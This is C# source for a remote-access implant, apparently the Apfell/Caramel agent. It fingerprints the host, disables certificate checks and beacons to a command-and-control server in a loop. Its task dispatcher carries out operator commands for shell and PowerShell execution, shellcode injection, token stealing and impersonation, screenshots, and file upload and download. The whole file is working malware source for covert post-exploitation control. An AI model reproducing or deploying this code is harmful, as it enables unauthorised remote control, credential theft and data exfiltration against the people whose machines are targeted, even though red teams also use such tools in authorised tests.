private void SendResult(SCImplant implant)
{
if (this.status == "complete" &&
this.command != "download" &&
this.command != "screencapture")
{
implant.PostResponse(new SCTaskResp(this.id, this.message));
implant.SendComplete(this.id);
}
else if (this.status == "error")
{
implant.SendError(this.id, this.message);
}
try
{
for (int i = 0; i < implant.jobs.Count; ++i)
{
if (implant.jobs[i].shortId == this.shortId)
{
implant.jobs.RemoveAt(i);
}
}
}
catch (Exception e)
{
// This should only happen when testing.
Debug.WriteLine($"[!] Caught exception: {e.Message}");
}
}
static void Main(string[] args)
{
// Necessary to disable certificate validation
ServicePointManager.ServerCertificateValidationCallback =
delegate { return true; };
SCImplant implant = new SCImplant()
{
uuid = args[2], // Generated when payload is created in Apfell
endpoint = args[0] + "/api/v1.3/",
host = Dns.GetHostName(),
ip = Dns.GetHostEntry(Dns.GetHostName()) // Necessary because the host may have more than one interface
.AddressList.FirstOrDefault(ip => ip.AddressFamily == AddressFamily.InterNetwork).ToString(),
domain = Environment.UserDomainName,
os = Environment.OSVersion.VersionString,
architecture = "x64",
pid = Process.GetCurrentProcess().Id,
sleep = 5000,
user = Environment.UserName
};
HTTP.crypto.PSK = Convert.FromBase64String(args[1]);
if (implant.InitializeImplant())
{
int shortId = 1;
while (true)
{
SCTask task = implant.CheckTasking();
if (task.command != "none")
{
task.shortId = shortId;
shortId++;
Thread t = new Thread(() => task.DispatchTask(implant));
t.Start();
if (task.command != "jobs" || task.command != "jobkill") // We don't want to add our job tracking jobs.
{
Job j = new Job
{
shortId = task.shortId,
task = task.command,
thread = t
};
if (task.@params != "")
j.task += " " + task.@params;
implant.jobs.Add(j);
}
}
Thread.Sleep(implant.sleep);
}
}
}
/// <summary>
/// Handle a new task.
/// </summary>
/// <param name="implant">The CaramelImplant we're handling a task for</param>
public void DispatchTask(SCImplant implant)
{
if (this.command == "cd")
{
Debug.WriteLine("[-] DispatchTask - Tasked to change directory " + this.@params);
ChangeDir.Execute(this);
}
else if (this.command == "download")
{
Debug.WriteLine("[-] DispatchTask - Tasked to send file " + this.@params);
Download.Execute(this, implant);
}
else if (this.command == "execute_assembly")
{
Debug.WriteLine("[-] DispatchTask - Tasked to execute assembly " + this.@params);
Tasks.ExecAssembly.Execute(this, implant);
}
else if (this.command == "exit")
{
Debug.WriteLine("[-] DispatchTask - Tasked to exit");
Exit.Execute(this, implant);
}
else if (this.command == "jobs")
{
Debug.WriteLine("[-] DispatchTask - Tasked to list jobs");
Jobs.Execute(this, implant);
}
else if (this.command == "jobkill")
{
Debug.WriteLine($"[-] DispatchTask - Tasked to kill job {this.@params}");
Jobs.Execute(this, implant);
}
else if (this.command == "kill")
{
Debug.WriteLine("[-] DispatchTask - Tasked to kill PID " + this.@params);
Kill.Execute(this);
}
else if (this.command == "ls")
{
string path = this.@params;
Debug.WriteLine("[-] DispatchTask - Tasked to list directory " + path);
DirectoryList.Execute(this, implant);
}
else if (this.command == "make_token")
{
Debug.WriteLine("[-] DispatchTask - Tasked to make a token for " + [email protected](' ')[0]);
Token.Execute(this);
}
else if (this.command == "ps")
{
Debug.WriteLine("[-] DispatchTask - Tasked to list processes");
ProcessList.Execute(this);
}
else if (this.command == "powershell")
{
Debug.WriteLine("[-] DispatchTask - Tasked to run powershell");
Powershell.Execute(this);
}
else if (this.command == "rev2self")
{
Debug.WriteLine("[-] DispatchTask - Tasked to revert token");
Token.Revert(this);
}
else if (this.command == "run")
{
Debug.WriteLine("[-] DispatchTask - Tasked to start process");
Proc.Execute(this, implant);
}
else if (this.command == "screencapture")
{
Debug.WriteLine("[-] DispatchTask - Tasked to take screenshot.");
ScreenCapture.Execute(this, implant);
}
else if (this.command == "shell")
{
Debug.WriteLine("[-] DispatchTask - Tasked to run shell command.");
Proc.Execute(this, implant);
}
else if (this.command == "shinject")
{
Debug.WriteLine("[-] DispatchTask - Tasked to run shellcode.");
Shellcode.Execute(this);
}
else if (this.command == "sleep")
{
try
{
int sleep = Convert.ToInt32(this.@params);
Debug.WriteLine("[-] DispatchTask - Tasked to change sleep to: " + sleep);
implant.sleep = sleep * 1000;
this.status = "complete";
}
catch
{
Debug.WriteLine("[-] DispatchTask - ERROR sleep value provided was not int");
this.status = "error";
this.message = "Please provide an integer value";
}
}
else if (this.command == "spawn")
{
Debug.WriteLine("[-] DispatchTask - Tasked to spawn");
Spawn.Execute(this);
}
else if (this.command == "steal_token")
{
Debug.WriteLine("[-] DispatchTask - Tasked to steal token");
Token.Execute(this);
}
else if (this.command == "upload")
{
Debug.WriteLine("[-] DispatchTask - Tasked to get file from server");
Upload.Execute(this, implant);
}
this.SendResult(implant);
}